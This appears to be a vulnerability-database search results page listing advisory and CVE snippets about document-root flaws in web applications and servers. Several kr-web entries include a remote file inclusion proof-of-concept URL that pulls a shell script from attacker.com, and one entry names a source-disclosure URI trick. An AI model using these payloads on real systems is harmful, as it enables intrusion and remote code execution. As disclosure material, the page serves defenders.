261 matches found
Quick Classifieds 1.0 - controlcenter/remember.php3 DOCUMENT_ROOT Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/28417/info Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the applicati...
Apple Mac OS X Server 10.5 - Wiki Server Directory Traversal Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28278/info Apple Mac OS X Server Wiki Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue allows an attacker to access arbitrary...
Design/Logic Flaw
Mambo CMS 4.6.5 stores the MySQL database password in cleartext in the document root, which allows local users to obtain sensitive information via unspecified vectors...
Directory traversal
PHP-Fusion before 7.02.06 stores backup files with predictable filenames in an unrestricted directory under the web document root, which might allow remote attackers to obtain sensitive information via a direct request to the backup file in administration/dbbackups/...
[SECURITY] [DSA 2877-1] lighttpd security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2877-1 [email protected] http://www.debian.org/security/ Michael Gilbert March 12, 2014 http://www.debian.org/security/faq -...
Debian DSA-2877-1 : lighttpd - security update
Several vulnerabilities were discovered in the lighttpd web server. - CVE-2014-2323 Jann Horn discovered that specially crafted host names can be used to inject arbitrary MySQL queries in lighttpd servers using the MySQL virtual hosting module modmysqlvhost. This only affects installations with t...
[SECURITY] [DSA 2877-1] lighttpd security update
------------------------------------------------------------------------- Debian Security Advisory DSA-2877-1 [email protected] http://www.debian.org/security/ Michael Gilbert March 12, 2014 http://www.debian.org/security/faq -...
Debian Security Advisory DSA 2877-1 (lighttpd - security update)
Several vulnerabilities were discovered in the lighttpd web server. CVE-2014-2323 Jann Horn discovered that specially crafted host names can be used to inject arbitrary MySQL queries in lighttpd servers using the MySQL virtual hosting module modmysqlvhost. This only affects installations with the...
Improper access control
DFLabs PTK 1.0.5 stores data files with predictable names under the web document root with insufficient access control, which allows remote attackers to read logs, images, or reports via a direct request to the file in the 1 log, 2 images, or 3 report directory...
Apache Mixed Platform AddType Directive Information Disclosure
The remote host appears to be running Apache. When Apache runs on a Unix host with a document root on a Windows SMB share, remote, unauthenticated attackers could obtain the unprocessed contents of the directory. For example, requesting a PHP file with a trailing backslash could display the file'...
CVE-2010-2336
index.php in Yamamah Photo Gallery 1.00 allows remote attackers to obtain the source code of executable files within the web document root via the download parameter...
CVE-2010-2263
nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI...
Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability
Exploit for unknown platform in category web applications ================================================== Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability ================================================== Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability Created By 1nd0n3s14n l4m3r c --...
Power BB 1.8.3 - Remote File Inclusions
Power BB 1.8.3 - Remote File Inclusions Dada?lar Grup Komutanl??? | HackSpy | Zombie | KroNickq | DigitALL | NoFearx38 | 1923Turk Grup by DigitALL Sites : http://powerwd.net Download : http://www.phpexplorer.com/Goster/536 Download : http://sourceforge.net/projects/pbb/ Power BB 1.8.3 Remote File...
kr-web 1.1b2 - Remote File Inclusion
kr-web 1.1b2 - Remote File Inclusion Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web PoC : http://server/path/adm/krgourl.php?DOCUMENTROOT=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang membenciku dan menyayangiku I...
kr-web 1.1b2 - Remote File Inclusion
Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web PoC : http://server/path/adm/krgourl.php?DOCUMENTROOT=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang membenciku dan menyayangiku I Love U Full : /\ all member at...
KR-Web 1.1b2 Remote File Inclusion
Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web PoC : http://0wn3d.com/path/adm/krgourl.php?DOCUMENTROOT=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang membenciku dan menyayangiku I Love U Full : /\ all member at...
CVE-2009-1941
PAD Site Scripts 3.6 stores sensitive information under the web document root with insufficient access control, which allows remote attackers to download the database and obtain sensitive information via a direct request for dbbackup.txt...
Improper access control
PAD Site Scripts 3.6 stores sensitive information under the web document root with insufficient access control, which allows remote attackers to download the database and obtain sensitive information via a direct request for dbbackup.txt...
CVE-2009-1941
CVE-2009-1941 affects PAD Site Scripts 3.6. The vulnerability arises from storing sensitive information under the web document root with insufficient access control, allowing remote attackers to download the database via a direct request for dbbackup.txt. Impact is consistent with the CVSS v2 bas...